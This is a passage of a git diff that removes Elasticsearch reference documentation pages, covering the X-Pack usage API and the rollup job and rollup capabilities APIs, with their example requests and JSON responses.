"99a07c016d5a73"/"build_hash": "$body.features.ml.native_code_info.build_hash"/] -// TESTRESPONSE[s/"eql" : \{[^\}]*\},/"eql": $body.$_path,/] -// eql is disabled by default on release builds and enabled everywhere else during the initial implementation phase until its release -// So much s/// but at least we test that the layout is close to matching.... - -The following example only returns the build and features information: - -[source,console] ------------------------------------------------------------- -GET /_xpack?categories=build,features ------------------------------------------------------------- - -The following example removes the descriptions from the response: - -[source,console] ------------------------------------------------------------- -GET /_xpack?human=false ------------------------------------------------------------- diff --git a/docs/reference/rest-api/usage.asciidoc b/docs/reference/rest-api/usage.asciidoc deleted file mode 100644 index 7289b0d27b6..00000000000 --- a/docs/reference/rest-api/usage.asciidoc +++ /dev/null @@ -1,370 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[usage-api]] -== Usage API - -Provides usage information about the installed {xpack} features. - -[discrete] -[[usage-api-request]] -=== {api-request-title} - -`GET /_xpack/usage` - -[discrete] -[[usage-api-desc]] -=== {api-description-title} - -This API provides information about which features are currently enabled and -available under the current license and some usage statistics. - -[discrete] -[[usage-api-query-parms]] -=== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[discrete] -[[usage-api-example]] -=== {api-examples-title} - -[source,console] ------------------------------------------------------------- -GET /_xpack/usage ------------------------------------------------------------- - -[source,console-result] ------------------------------------------------------------- -{ - "security" : { - "available" : true, - "enabled" : false, - "ssl" : { - "http" : { - "enabled" : false - }, - "transport" : { - "enabled" : false - } - } - }, - "monitoring" : { - "available" : true, - "enabled" : true, - "collection_enabled" : false, - "enabled_exporters" : { - "local" : 1 - } - }, - "watcher" : { - "available" : true, - "enabled" : true, - "execution" : { - "actions" : { - "_all" : { - "total" : 0, - "total_time_in_ms" : 0 - } - } - }, - "watch" : { - "input" : { - "_all" : { - "total" : 0, - "active" : 0 - } - }, - "trigger" : { - "_all" : { - "total" : 0, - "active" : 0 - } - } - }, - "count" : { - "total" : 0, - "active" : 0 - } - }, - "graph" : { - "available" : true, - "enabled" : true - }, - "ml" : { - "available" : true, - "enabled" : true, - "jobs" : { - "_all" : { - "count" : 0, - "detectors" : { - ... - }, - "created_by" : { }, - "model_size" : { - ... - }, - "forecasts" : { - "total" : 0, - "forecasted_jobs" : 0 - } - } - }, - "datafeeds" : { - "_all" : { - "count" : 0 - } - }, - "data_frame_analytics_jobs" : { - "_all" : { - "count" : 0 - } - }, - "inference" : { - "ingest_processors" : { - "_all" : { - "num_docs_processed" : { - "max" : 0, - "sum" : 0, - "min" : 0 - }, - "pipelines" : { - "count" : 0 - }, - "num_failures" : { - "max" : 0, - "sum" : 0, - "min" : 0 - }, - "time_ms" : { - "max" : 0, - "sum" : 0, - "min" : 0 - } - } - }, - "trained_models" : { - "_all" : { - "count" : 0 - } - } - }, - "node_count" : 1 - }, - "logstash" : { - "available" : true, - "enabled" : true - }, - "eql" : { - "available" : true, - "enabled" : true - }, - "sql" : { - "available" : true, - "enabled" : true, - "features" : { - "having" : 0, - "subselect" : 0, - "limit" : 0, - "orderby" : 0, - "where" : 0, - "join" : 0, - "groupby" : 0, - "command" : 0, - "local" : 0 - }, - "queries" : { - "rest" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "cli" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "canvas" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "odbc" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "jdbc" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "odbc32" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "odbc64" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "_all" : { - "total" : 0, - "paging" : 0, - "failed" : 0 - }, - "translate" : { - "count" : 0 - } - } - }, - "rollup" : { - "available" : true, - "enabled" : true - }, - "ilm" : { - "policy_count" : 3, - "policy_stats" : [ - ... - ] - }, - "slm" : { - "available" : true, - "enabled" : true - }, - "ccr" : { - "available" : true, - "enabled" : true, - "follower_indices_count" : 0, - "auto_follow_patterns_count" : 0 - }, - "enrich" : { - "available" : true, - "enabled" : true - }, - "transform" : { - "available" : true, - "enabled" : true - }, - "flattened" : { - "available" : true, - "enabled" : true, - "field_count" : 0 - }, - "vectors" : { - "available" : true, - "enabled" : true, - "dense_vector_fields_count" : 0, - "dense_vector_dims_avg_count" : 0, - "sparse_vector_fields_count" : 0 - }, - "voting_only" : { - "available" : true, - "enabled" : true - }, - "searchable_snapshots" : { - "available" : true, - "enabled" : true, - "indices_count" : 0 - }, - "frozen_indices" : { - "available" : true, - "enabled" : true, - "indices_count" : 0 - }, - "spatial" : { - "available" : true, - "enabled" : true - }, - "analytics" : { - "available" : true, - "enabled" : true, - "stats": { - "boxplot_usage" : 0, - "top_metrics_usage" : 0, - "normalize_usage" : 0, - "cumulative_cardinality_usage" : 0, - "t_test_usage" : 0, - "rate_usage" : 0, - "string_stats_usage" : 0, - "moving_percentiles_usage" : 0 - } - }, - "data_streams" : { - "available" : true, - "enabled" : true, - "data_streams" : 0, - "indices_count" : 0 - }, - "data_tiers" : { - "available" : true, - "enabled" : true, - "data_warm" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" : 0, - "primary_shard_size_mad_bytes" : 0 - }, - "data_cold" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" : 0, - "primary_shard_size_mad_bytes" : 0 - }, - "data_content" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" : 0, - "primary_shard_size_mad_bytes" : 0 - }, - "data_hot" : { - "node_count" : 0, - "index_count" : 0, - "total_shard_count" : 0, - "primary_shard_count" : 0, - "doc_count" : 0, - "total_size_bytes" : 0, - "primary_size_bytes" : 0, - "primary_shard_size_avg_bytes" : 0, - "primary_shard_size_median_bytes" : 0, - "primary_shard_size_mad_bytes" : 0 - } - } -} ------------------------------------------------------------- -// TESTRESPONSE[s/"detectors" : \{[^\}]*\},/"detectors" : $body.$_path,/] -// TESTRESPONSE[s/"model_size" : \{[^\}]*\},/"model_size" : $body.$_path,/] -// TESTRESPONSE[s/"eql" : \{[^\}]*\},/"eql" : $body.$_path,/] -// TESTRESPONSE[s/"ilm" : \{[^\}]*\},/"ilm" : $body.$_path,/] -// TESTRESPONSE[s/"slm" : \{[^\}]*\},/"slm" : $body.$_path,/] -// TESTRESPONSE[s/ : true/ : $body.$_path/] -// TESTRESPONSE[s/ : false/ : $body.$_path/] -// TESTRESPONSE[s/ : (\-)?[0-9]+/ : $body.$_path/] -// These replacements do a few things: -// 1. Handling eql, which is disabled by default on release builds and enabled -// everywhere else during the initial implementation phase until its release -// 2. Ignore the contents of the `ilm` and `slm` objects because they don't know -// all of the policies that will be in them. -// 3. Ignore the contents of the `analytics` object because it might contain -// additional stats -// 4. All of the numbers and strings on the right hand side of *every* field in -// the response are ignored. So we're really only asserting things about the -// the shape of this response, not the values in it. diff --git a/docs/reference/rollup/api-quickref.asciidoc b/docs/reference/rollup/api-quickref.asciidoc deleted file mode 100644 index 89c29b98b59..00000000000 --- a/docs/reference/rollup/api-quickref.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-api-quickref]] -=== {rollup-cap} API quick reference -++++ -API quick reference -++++ - -experimental[] - -Most rollup endpoints have the following base: - -[source,js] ----- -/_rollup/ ----- -// NOTCONSOLE - -[discrete] -[[rollup-api-jobs]] -==== /job/ - -* {ref}/rollup-put-job.html[PUT /_rollup/job/+++]: Create a {rollup-job} -* {ref}/rollup-get-job.html[GET /_rollup/job]: List {rollup-jobs} -* {ref}/rollup-get-job.html[GET /_rollup/job/+++]: Get {rollup-job} details -* {ref}/rollup-start-job.html[POST /_rollup/job//_start]: Start a {rollup-job} -* {ref}/rollup-stop-job.html[POST /_rollup/job//_stop]: Stop a {rollup-job} -* {ref}/rollup-delete-job.html[DELETE /_rollup/job/+++]: Delete a {rollup-job} - -[discrete] -[[rollup-api-data]] -==== /data/ - -* {ref}/rollup-get-rollup-caps.html[GET /_rollup/data//_rollup_caps+++]: Get Rollup Capabilities -* {ref}/rollup-get-rollup-index-caps.html[GET //_rollup/data/+++]: Get Rollup Index Capabilities - -[discrete] -[[rollup-api-index]] -==== // - -* {ref}/rollup-search.html[GET //_rollup_search]: Search rollup data diff --git a/docs/reference/rollup/apis/delete-job.asciidoc b/docs/reference/rollup/apis/delete-job.asciidoc deleted file mode 100644 index 12ad52eceda..00000000000 --- a/docs/reference/rollup/apis/delete-job.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-delete-job]] -=== Delete {rollup-jobs} API -[subs="attributes"] -++++ -Delete {rollup-jobs} -++++ - -Deletes an existing {rollup-job}. - -experimental[] - -[[rollup-delete-job-request]] -==== {api-request-title} - -`DELETE _rollup/job/` - -[[rollup-delete-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. - -[[rollup-delete-job-desc]] -==== {api-description-title} - -A job must be *stopped* first before it can be deleted. If you attempt to delete -a started job, an error occurs. Similarly, if you attempt to delete a -nonexistent job, an exception occurs. - -[IMPORTANT] -=============================== -When a job is deleted, that only removes the process that is actively monitoring -and rolling up data. It does not delete any previously rolled up data. This is -by design; a user may wish to roll up a static dataset. Because the dataset is -static, once it has been fully rolled up there is no need to keep the indexing -rollup job around (as there will be no new data). So the job can be deleted, -leaving behind the rolled up data for analysis. - -If you wish to also remove the rollup data, and the rollup index only contains -the data for a single job, you can simply delete the whole rollup index. If the -rollup index stores data from several jobs, you must issue a delete-by-query -that targets the rollup job's ID in the rollup index. - -[source,js] --------------------------------------------------- -POST my_rollup_index/_delete_by_query -{ - "query": { - "term": { - "_rollup.id": "the_rollup_job_id" - } - } -} --------------------------------------------------- -// NOTCONSOLE -=============================== - -[[rollup-delete-job-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the job. - -[[rollup-delete-job-response-codes]] -==== {api-response-codes-title} - -`404` (Missing resources):: - This code indicates that there are no resources that match the request. It - occurs if you try to delete a job that doesn't exist. - -[[rollup-delete-job-example]] -==== {api-example-title} - -If we have a rollup job named `sensor`, it can be deleted with: - -[source,console] --------------------------------------------------- -DELETE _rollup/job/sensor --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -Which will return the response: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/rollup/apis/get-job.asciidoc b/docs/reference/rollup/apis/get-job.asciidoc deleted file mode 100644 index 4219de26be7..00000000000 --- a/docs/reference/rollup/apis/get-job.asciidoc +++ /dev/null @@ -1,323 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-get-job]] -=== Get {rollup-jobs} API -++++ -Get job -++++ - -Retrieves the configuration, stats, and status of {rollup-jobs}. - -experimental[] - -[[rollup-get-job-request]] -==== {api-request-title} - -`GET _rollup/job/` - -[[rollup-get-job-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor`, -`monitor_rollup`, `manage` or `manage_rollup` cluster privileges to use this API. -For more information, see <>. - -[[rollup-get-job-desc]] -==== {api-description-title} - -The API can return the details for a single {rollup-job} or for all {rollup-jobs}. - -NOTE: This API returns only active (both `STARTED` and `STOPPED`) jobs. If a job -was created, ran for a while then deleted, this API does not return any details -about that job. - -For details about a historical {rollup-job}, the -<> may be more useful. - -[[rollup-get-job-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) Identifier for the {rollup-job}. If it is `_all` or omitted, - the API returns all {rollup-jobs}. - -[role="child_attributes"] -[[rollup-get-job-response-body]] -==== {api-response-body-title} - -`jobs`:: -(array) An array of {rollup-job} resources. -+ -.Properties of {rollup-job} resources -[%collapsible%open] -==== -`config`::: -(object) Contains the configuration for the {rollup-job}. This information is -identical to the configuration that was supplied when creating the job via the -<>. - -`stats`::: -(object) Contains transient statistics about the {rollup-job}, such as how many -documents have been processed and how many rollup summary docs have been -indexed. These stats are not persisted. If a node is restarted, these stats are -reset. - -`status`::: -(object) Contains the current status of the indexer for the {rollup-job}. The -possible values and their meanings are: -+ -- `stopped` means the indexer is paused and will not process data, even if its -cron interval triggers. -- `started` means the indexer is running, but not actively indexing data. When -the cron interval triggers, the job's indexer will begin to process data. -- `indexing` means the indexer is actively processing data and creating new -rollup documents. When in this state, any subsequent cron interval triggers will -be ignored because the job is already active with the prior trigger. -- `abort` is a transient state, which is usually not witnessed by the user. It -is used if the task needs to be shut down for some reason (job has been deleted, -an unrecoverable error has been encountered, etc). Shortly after the `abort` -state is set, the job will remove itself from the cluster. -==== - -[[rollup-get-job-example]] -==== {api-examples-title} - -If we have already created a rollup job named `sensor`, the details about the -job can be retrieved with: - -[source,console] --------------------------------------------------- -GET _rollup/job/sensor --------------------------------------------------- -// TEST[setup:sensor_rollup_job] - -The API yields the following response: - -[source,console-result] ----- -{ - "jobs": [ - { - "config": { - "id": "sensor", - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "groups": { - "date_histogram": { - "fixed_interval": "1h", - "delay": "7d", - "field": "timestamp", - "time_zone": "UTC" - }, - "terms": { - "fields": [ - "node" - ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ - "min", - "max", - "sum" - ] - }, - { - "field": "voltage", - "metrics": [ - "avg" - ] - } - ], - "timeout": "20s", - "page_size": 1000 - }, - "status": { - "job_state": "stopped", - "upgraded_doc_id": true - }, - "stats": { - "pages_processed": 0, - "documents_processed": 0, - "rollups_indexed": 0, - "trigger_count": 0, - "index_failures": 0, - "index_time_in_ms": 0, - "index_total": 0, - "search_failures": 0, - "search_time_in_ms": 0, - "search_total": 0, - "processing_time_in_ms": 0, - "processing_total": 0 - } - } - ] -} ----- - -The `jobs` array contains a single job (`id: sensor`) since we requested a single job in the endpoint's URL. -If we add another job, we can see how multi-job responses are handled: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor2 <1> -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} - -GET _rollup/job/_all <2> --------------------------------------------------- -// TEST[setup:sensor_rollup_job] -<1> We create a second job with name `sensor2` -<2> Then request all jobs by using `_all` in the GetJobs API - -Which will yield the following response: - -[source,js] ----- -{ - "jobs": [ - { - "config": { - "id": "sensor2", - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "groups": { - "date_histogram": { - "fixed_interval": "1h", - "delay": "7d", - "field": "timestamp", - "time_zone": "UTC" - }, - "terms": { - "fields": [ - "node" - ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ - "min", - "max", - "sum" - ] - }, - { - "field": "voltage", - "metrics": [ - "avg" - ] - } - ], - "timeout": "20s", - "page_size": 1000 - }, - "status": { - "job_state": "stopped", - "upgraded_doc_id": true - }, - "stats": { - "pages_processed": 0, - "documents_processed": 0, - "rollups_indexed": 0, - "trigger_count": 0, - "index_failures": 0, - "index_time_in_ms": 0, - "index_total": 0, - "search_failures": 0, - "search_time_in_ms": 0, - "search_total": 0, - "processing_time_in_ms": 0, - "processing_total": 0 - } - }, - { - "config": { - "id": "sensor", - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "groups": { - "date_histogram": { - "fixed_interval": "1h", - "delay": "7d", - "field": "timestamp", - "time_zone": "UTC" - }, - "terms": { - "fields": [ - "node" - ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ - "min", - "max", - "sum" - ] - }, - { - "field": "voltage", - "metrics": [ - "avg" - ] - } - ], - "timeout": "20s", - "page_size": 1000 - }, - "status": { - "job_state": "stopped", - "upgraded_doc_id": true - }, - "stats": { - "pages_processed": 0, - "documents_processed": 0, - "rollups_indexed": 0, - "trigger_count": 0, - "index_failures": 0, - "index_time_in_ms": 0, - "index_total": 0, - "search_failures": 0, - "search_time_in_ms": 0, - "search_total": 0, - "processing_time_in_ms": 0, - "processing_total": 0 - } - } - ] -} ----- -// NOTCONSOLE diff --git a/docs/reference/rollup/apis/put-job.asciidoc b/docs/reference/rollup/apis/put-job.asciidoc deleted file mode 100644 index 43a2f9f6f4f..00000000000 --- a/docs/reference/rollup/apis/put-job.asciidoc +++ /dev/null @@ -1,290 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-put-job]] -=== Create {rollup-jobs} API -[subs="attributes"] -++++ -Create {rollup-jobs} -++++ - -Creates a {rollup-job}. - -experimental[] - -[[rollup-put-job-api-request]] -==== {api-request-title} - -`PUT _rollup/job/` - -[[rollup-put-job-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage` or -`manage_rollup` cluster privileges to use this API. For more information, see -<>. - -[[rollup-put-job-api-desc]] -==== {api-description-title} - -The {rollup-job} configuration contains all the details about how the job should -run, when it indexes documents, and what future queries will be able to execute -against the rollup index. - -There are three main sections to the job configuration: the logistical details -about the job (cron schedule, etc), the fields that are used for grouping, and -what metrics to collect for each group. - -Jobs are created in a `STOPPED` state. You can start them with the -<>. - -[[rollup-put-job-api-path-params]] -==== {api-path-parms-title} - -``:: - (Required, string) Identifier for the {rollup-job}. This can be any - alphanumeric string and uniquely identifies the data that is associated with - the {rollup-job}. The ID is persistent; it is stored with the rolled up data. - If you create a job, let it run for a while, then delete the job, the data - that the job rolled up is still be associated with this job ID. You cannot - create a new job with the same ID since that could lead to problems with - mismatched job configurations. - -[role="child_attributes"] -[[rollup-put-job-api-request-body]] -==== {api-request-body-title} - -`cron`:: -(Required, string) A cron string which defines the intervals when the -{rollup-job} should be executed. When the interval triggers, the indexer -attempts to rollup the data in the index pattern. The cron pattern is -unrelated to the time interval of the data being rolled up. For example, you -may wish to create hourly rollups of your document but to only run the indexer -on a daily basis at midnight, as defined by the cron. The cron pattern is -defined just like a {watcher} cron schedule. - -//Begin groups -[[rollup-groups-config]] -`groups`:: -(Required, object) Defines the grouping fields and aggregations that are -defined for this {rollup-job}. These fields will then be available later for -aggregating into buckets. -+ -These aggs and fields can be used in any combination. Think of the `groups` -configuration as defining a set of tools that can later be used in aggregations -to partition the data. Unlike raw data, we have to think ahead to which fields -and aggregations might be used. Rollups provide enough flexibility that you -simply need to determine _which_ fields are needed, not _in what order_ they are -needed. -+ -There are three types of groupings currently available: `date_histogram`, -`histogram`, and `terms`. -+ -.Properties of `groups` -[%collapsible%open] -==== -//Begin date_histogram -`date_histogram`::: -(Required, object) A date histogram group aggregates a `date` field into -time-based buckets. This group is *mandatory*; you currently cannot rollup -documents without a timestamp and a `date_histogram` group. The -`date_histogram` group has several parameters: -+ -.Properties of `date_histogram` -[%collapsible%open] -===== -`calendar_interval` or `fixed_interval`:::: -(Required, <>) The interval of time buckets to be -generated when rolling up. For example, `60m` produces 60 minute (hourly) -rollups. This follows standard time formatting syntax as used elsewhere in {es}. -The interval defines the _minimum_ interval that can be aggregated only. If -hourly (`60m`) intervals are configured, <> -can execute aggregations with 60m or greater (weekly, monthly, etc) intervals. -So define the interval as the smallest unit that you wish to later query. For -more information about the difference between calendar and fixed time -intervals, see <>. -+ --- -NOTE: Smaller, more granular intervals take up proportionally more space. - --- - -`delay`:::: -(Optional,<>) How long to wait before rolling up new -documents. By default, the indexer attempts to roll up all data that is -available. However, it is not uncommon for data to arrive out of order, -sometimes even a few days late. The indexer is unable to deal with data that -arrives after a time-span has been rolled up. That is to say, there is no -provision to update already-existing rollups. -+ --- -Instead, you should specify a `delay` that matches the longest period of time -you expect out-of-order data to arrive. For example, a `delay` of `1d` -instructs the indexer to roll up documents up to `now - 1d`, which provides -a day of buffer time for out-of-order documents to arrive. --- - -`field`:::: -(Required, string) The date field that is to be rolled up. - -`time_zone`:::: -(Optional, string) Defines what time_zone the rollup documents are stored as. -Unlike raw data, which can shift timezones on the fly, rolled documents have to -be stored with a specific timezone. By default, rollup documents are stored -in `UTC`. -===== -//End date_histogram - -//Begin histogram -`histogram`::: -(Optional, object) The histogram group aggregates one or more numeric fields -into numeric histogram intervals. -+ -.Properties of `histogram` -[%collapsible%open] -===== -`fields`:::: -(Required, array) The set of fields that you wish to build histograms for. All -fields specified must be some kind of numeric. Order does not matter. - -`interval`:::: -(Required, integer) The interval of histogram buckets to be generated when -rolling up. For example, a value of `5` creates buckets that are five units wide -(`0-5`, `5-10`, etc). Note that only one interval can be specified in the -`histogram` group, meaning that all fields being grouped via the histogram -must share the same interval. -===== -//End histogram - -//Begin terms -`terms`::: -(Optional, object) The terms group can be used on `keyword` or numeric fields to -allow bucketing via the `terms` aggregation at a later point. The indexer -enumerates and stores _all_ values of a field for each time-period. This can be -potentially costly for high-cardinality groups such as IP addresses, especially -if the time-bucket is particularly sparse. -+ --- -TIP: While it is unlikely that a rollup will ever be larger in size than the raw -data, defining `terms` groups on multiple high-cardinality fields can -effectively reduce the compression of a rollup to a large extent. You should be -judicious which high-cardinality fields are included for that reason. - --- -+ -.Properties of `terms` -[%collapsible%open] -===== - -`fields`:::: -(Required, string) The set of fields that you wish to collect terms for. This -array can contain fields that are both `keyword` and numerics. Order does not -matter. -===== -//End terms -==== -//End groups - -`index_pattern`:: -(Required, string) The index or index pattern to roll up. Supports -wildcard-style patterns (`logstash-*`). The job attempts to rollup the entire -index or index-pattern. -+ --- -NOTE: The `index_pattern` cannot be a pattern that would also match the -destination `rollup_index`. For example, the pattern `foo-*` would match the -rollup index `foo-rollup`. This situation would cause problems because the -{rollup-job} would attempt to rollup its own data at runtime. If you attempt to -configure a pattern that matches the `rollup_index`, an exception occurs to -prevent this behavior. - --- - -//Begin metrics -[[rollup-metrics-config]] -`metrics`:: -(Optional, object) Defines the metrics to collect for each grouping tuple. By -default, only the doc_counts are collected for each group. To make rollup useful, -you will often add metrics like averages, mins, maxes, etc. Metrics are defined -on a per-field basis and for each field you configure which metric should be -collected. -+ -The `metrics` configuration accepts an array of objects, where each object has -two parameters. -+ -.Properties of metric objects -[%collapsible%open] -==== -`field`::: -(Required, string) The field to collect metrics for. This must be a numeric of -some kind. - -`metrics`::: -(Required, array) An array of metrics to collect for the field. At least one -metric must be configured. Acceptable metrics are `min`,`max`,`sum`,`avg`, and -`value_count`. -==== -//End metrics - -`page_size`:: -(Required, integer) The number of bucket results that are processed on each -iteration of the rollup indexer. A larger value tends to execute faster, but -requires more memory during processing. This value has no effect on how the data -is rolled up; it is merely used for tweaking the speed or memory cost of -the indexer. - -`rollup_index`:: -(Required, string) The index that contains the rollup results. The index can -be shared with other {rollup-jobs}. The data is stored so that it doesn't -interfere with unrelated jobs. - -[[rollup-put-job-api-example]] -==== {api-example-title} - -The following example creates a {rollup-job} named `sensor`, targeting the -`sensor-*` index pattern: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { <1> - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ <2> - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] -<1> This configuration enables date histograms to be used on the `timestamp` -field and `terms` aggregations to be used on the `node` field. -<2> This configuration defines metrics over two fields: `temperature` and -`voltage`. For the `temperature` field, we are collecting the min, max, and -sum of the temperature. For `voltage`, we are collecting the average. - -When the job is created, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/rollup/apis/rollup-caps.asciidoc b/docs/reference/rollup/apis/rollup-caps.asciidoc deleted file mode 100644 index 1d0e620a94f..00000000000 --- a/docs/reference/rollup/apis/rollup-caps.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-get-rollup-caps]] -=== Get {rollup-job} capabilities API -++++ -Get rollup caps -++++ - -Returns the capabilities of any {rollup-jobs} that have been configured for a -specific index or index pattern. - -experimental[] - -[[rollup-get-rollup-caps-request]] -==== {api-request-title} - -`GET _rollup/data/` - -[[rollup-get-rollup-caps-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor`, -`monitor_rollup`, `manage` or `manage_rollup` cluster privileges to use this API. -For more information, see <>. - -[[rollup-get-rollup-caps-desc]] -==== {api-description-title} - -This API is useful because a {rollup-job} is often configured to rollup only a -subset of fields from the source index. Furthermore, only certain aggregations -can be configured for various fields, leading to a limited subset of -functionality depending on that configuration. - -This API enables you to inspect an index and determine: - -1. Does this index have associated rollup data somewhere in the cluster? -2. If yes to the first question, what fields were rolled up, what aggregations -can be performed, and where does the data live? - -[[rollup-get-rollup-path-params]] -==== {api-path-parms-title} - -``:: - (string) Index, indices or index-pattern to return rollup capabilities for. - `_all` may be used to fetch rollup capabilities from all jobs. - - -[[rollup-get-rollup-example]] -==== {api-examples-title} - -Imagine we have an index named `sensor-1` full of raw data. We know that the -data will grow over time, so there will be a `sensor-2`, `sensor-3`, etc. Let's -create a {rollup-job} that targets the index pattern `sensor-*` to accommodate -this future scaling: - -[source,console] --------------------------------------------------- -PUT _rollup/job/sensor -{ - "index_pattern": "sensor-*", - "rollup_index": "sensor_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "voltage", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// TEST[setup:sensor_index] - -We can then retrieve the rollup capabilities of that index pattern (`sensor-*`) -via the following command: - -[source,console] --------------------------------------------------- -GET _rollup/data/sensor-* --------------------------------------------------- -// TEST[continued] - -Which will yield the following response: - -[source,console-result] ----- -{ - "sensor-*" : { - "rollup_jobs" : [ - { - "job_id" : "sensor", - "rollup_index" : "sensor_rollup", - "index_pattern" : "sensor-*", - "fields" : { - "node" : [ - { - "agg" : "terms" - } - ], - "temperature" : [ - { - "agg" : "min" - }, - { - "agg" : "max" - }, - { - "agg" : "sum" - } - ], - "timestamp" : [ - { - "agg" : "date_histogram", - "time_zone" : "UTC", - "fixed_interval" : "1h", - "delay": "7d" - } - ], - "voltage" : [ - { - "agg" : "avg" - } - ] - } - } - ] - } -} ----- - -The response that is returned contains information that is similar to the -original rollup configuration, but formatted differently. First, there are some -house-keeping details: the {rollup-job} ID, the index that holds the rolled data, -and the index pattern that the job was targeting. - -Next it shows a list of fields that contain data eligible for rollup searches. -Here we see four fields: `node`, `temperature`, `timestamp` and `voltage`. Each -of these fields list the aggregations that are possible. For example, you can -use a min, max or sum aggregation on the `temperature` field, but only a -`date_histogram` on `timestamp`. - -Note that the `rollup_jobs` element is an array; there can be multiple, -independent jobs configured for a single index or index pattern. Each of these -jobs may have different configurations, so the API returns a list of all the -various configurations available. - -We could also retrieve the same information with a request to `_all`: - -[source,console] --------------------------------------------------- -GET _rollup/data/_all --------------------------------------------------- -// TEST[continued] - -But note that if we use the concrete index name (`sensor-1`), we'll retrieve no -rollup capabilities: - -[source,console] --------------------------------------------------- -GET _rollup/data/sensor-1 --------------------------------------------------- -// TEST[continued] - -[source,console-result] ----- -{ - -} ----- - -Why is this? The original {rollup-job} was configured against a specific index -pattern (`sensor-*`) not a concrete index (`sensor-1`). So while the index -belongs to the pattern, the {rollup-job} is only valid across the entirety of -the pattern not just one of it's containing indices. So for that reason, the -get rollup capabilities API only returns information based on the originally -configured index name or pattern. diff --git a/docs/reference/rollup/apis/rollup-index-caps.asciidoc b/docs/reference/rollup/apis/rollup-index-caps.asciidoc deleted file mode 100644 index b8cce32db5d..00000000000 --- a/docs/reference/rollup/apis/rollup-index-caps.asciidoc +++ /dev/null @@ -1,167 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-get-rollup-index-caps]] -=== Get rollup index capabilities API -++++ -Get rollup index caps -++++ - -Returns the rollup capabilities of all jobs inside of a rollup index (e.g. the -index where rollup data is stored). - -experimental[] - -[[rollup-get-rollup-index-caps-request]] -==== {api-request-title} - -`GET /_rollup/data` - -[[rollup-get-rollup-index-caps-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` index -privilege on the index that stores the rollup results. For more information, see -<>. - -[[rollup-get-rollup-index-caps-desc]] -==== {api-description-title} - -A single rollup index may store the data for multiple {rollup-jobs}, and may -have a variety of capabilities depending on those jobs. - -This API will allow you to determine: - -1. What jobs are stored in an index (or indices specified via a pattern)? -2. What target indices were rolled up, what fields were used in those rollups -and what aggregations can be performed on each job? - 